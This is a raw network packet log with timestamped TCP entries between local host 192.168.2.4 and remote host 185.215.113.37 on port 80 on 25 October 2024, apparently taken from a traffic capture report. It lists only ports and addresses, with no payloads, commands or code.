Oct 25, 2024 05:21:07.532809973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532825947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532839060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532855034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532875061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532887936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532907963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532928944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532947063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532963991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532980919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533000946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533019066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533034086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533052921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533076048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533086061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533097029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533119917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533139944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533154011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533175945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533186913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533200979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533221960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533243895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533255100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533272982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533288002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533294916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533317089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533339024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533349991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533359051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533384085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533407927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533415079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533426046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533448935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533469915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533483982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533493042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533520937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533540010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533554077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533570051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533584118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533607960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533617973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533634901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533653021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533672094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533688068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533710003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533720016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533727884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533752918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533767939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533787966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533802032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533822060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533839941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533855915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533878088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533886909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533900976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533920050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533924103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533952951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.533971071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.533982992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534001112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534018993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534024954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534054041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534070015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534087896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534101009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534125090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534133911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534153938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534183025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534188032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534204960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534221888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534245014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534252882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534267902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534286976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534307003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534321070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534337044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534354925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534367085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534389019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534405947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534423113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534436941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534457922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534471989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534491062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534509897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534523964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534533024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534558058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534573078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534590960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534600019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534625053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534645081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534657955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534667015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534691095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534708023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534728050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534737110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534764051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534780025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534799099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534818888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534832001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534842014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534866095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534881115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534898996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534910917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534954071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.534974098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.534989119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.535012007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.535024881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.535032988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.535073996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.601682901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601763964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601777077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.601799965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601836920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601847887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.601847887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.601872921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601887941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.601907969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601933002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.601943970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.601953030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602010965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602025032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602046967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602061033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602082014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602096081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602117062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602137089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602149963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602159977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602184057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602202892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602216959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602241039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602252007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602264881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602283955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602303982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602317095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602340937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602350950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602365017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602390051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602406025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602447987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602449894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602488041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.602500916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.602549076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643451929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643640041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643673897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643702984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643738031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643790960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643790960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643790960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643801928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643836975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643856049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643898964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643902063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643940926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.643946886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.643996000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644005060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644040108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644068956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644073963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644090891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644109011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644126892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644144058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644170046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644179106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644191980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644215107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644238949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644253016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644282103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644288063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644303083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644324064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644331932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644357920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644370079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644392014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644437075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644437075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644444942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644479990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644498110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644515991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644526958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644551039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644562006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644584894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644609928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644620895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644633055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644655943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644679070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644689083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644701004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644722939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644737959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644757986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644772053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644793987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644813061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644829035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644854069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644865036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644879103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644900084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644912958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644937038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644958019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.644973040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.644980907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645009041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645025015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645044088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645066977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645076990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645090103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645112038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645136118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645149946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645165920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645184994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645190954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645216942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.645240068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.645260096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.913971901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.913971901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.919636011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.919691086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.919753075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.919778109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.919805050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:08.707278013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:08.707493067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:08.794842005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:08.794842005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:08.800486088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:08.800518036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:08.800549030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:09.580683947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:09.580916882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:09.600378990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:09.605881929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:10.382963896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:10.383151054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:10.764029980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:10.769745111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:11.549763918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:11.549988985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:11.846036911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:11.851690054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.129725933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.129770994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.129807949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.129911900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.129929066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.129929066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.129945993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.129967928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.129993916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130040884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130088091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130126953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130161047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130175114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130175114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130175114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130196095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130213976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130223989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130244970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130279064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130315065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130343914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.130492926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130492926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130492926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130492926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.130492926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.289935112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290050030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290117025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290131092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290131092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290154934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290191889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290226936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290260077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290265083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290265083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290292025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290297031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290316105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290333033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290366888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:12.290381908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:12.290383101 CEST	49730	80	192.168.2.4	185.215.113.37
